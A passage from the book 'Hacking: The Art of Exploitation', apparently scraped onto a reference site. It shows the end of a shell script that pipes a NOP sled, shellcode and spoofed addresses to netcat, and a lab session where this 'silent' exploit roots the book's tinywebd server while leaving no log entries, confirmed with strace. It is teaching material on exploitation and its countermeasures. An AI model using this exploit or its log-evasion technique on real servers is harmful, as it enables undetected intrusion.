COUNTERMEASURES - Hacking: The Art of Exploitation

Graphics Programs Reference

In-Depth Information

(perl -e "print \"$FAKEREQUEST\"";

./addr_struct "$SPOOFIP" "$SPOOFPORT";

perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";

cat $1;

perl -e "print \"$RETADDR\"x32 . \"$FAKEADDR\"x2 . \"\x01\x00\x00\x00\r\n\"") | nc -w 1 -v $2

80

When this script is used, the exploit is totally silent and nothing is written

to the log file.

reader@hacking:~/booksrc $ sudo rm /Hacked

reader@hacking:~/booksrc $ ./tinywebd

Starting tiny web daemon..

reader@hacking:~/booksrc $ ls -l /var/log/tinywebd.log

-rw------- 1 root reader 6526 2007-09-19 23:24 /var/log/tinywebd.log

reader@hacking:~/booksrc $ ./xtool_tinywebd_silent.sh mark_restore 127.0.0.1

target IP: 127.0.0.1

shellcode: mark_restore (53 bytes)

fake request: "GET / HTTP/1.1\x00" (15 bytes)

[Fake Request 15] [spoof IP 16] [NOP 332] [shellcode 53] [ret addr 128] [*fake_addr 8]

localhost [127.0.0.1] 80 (www) open

reader@hacking:~/booksrc $ ls -l /var/log/tinywebd.log

-rw------- 1 root reader 6526 2007-09-19 23:24 /var/log/tinywebd.log

reader@hacking:~/booksrc $ ls -l /Hacked

-rw------- 1 root reader 0 2007-09-19 23:35 /Hacked

reader@hacking:~/booksrc $

Notice the log file's size and access time remain the same. Using this

technique, we can exploit tinywebd without leaving any trace in the log

files. In addition, the write calls execute cleanly, as everything is written to

/dev/null. This is shown by strace in the output below, when the silent

exploit tool is run in another terminal.

reader@hacking:~/booksrc $ ps aux | grep tinywebd

root 478 0.0 0.0 1636 420 ? Ss 23:24 0:00 ./tinywebd

reader 1005 0.0 0.0 2880 748 pts/1 R+ 23:36 0:00 grep tinywebd

reader@hacking:~/booksrc $ sudo strace -p 478 -e trace=write

Process 478 attached - interrupt to quit

write(1, "09/19/2007 23:36:31> ", 21) = 21

write(1, "From 12.34.56.78:9090 \"GET / HTT".., 47) = 47

Process 478 detached

reader@hacking:~/booksrc $

0x670

The Whole Infrastructure

As always, details can be hidden in the bigger picture. A single host usually

exists within some sort of infrastructure. Countermeasures such as intrusion

detection systems (IDS) and intrusion prevention systems (IPS) can detect

abnormal network traffic. Even simple log files on routers and firewalls can

reveal abnormal connections that are indicative of an intrusion. In partic-

ular, the connection to port 31337 used in our connect-back shellcode is a

Hacking: The Art of Exploitation

Search WWH ::

Custom Search

Home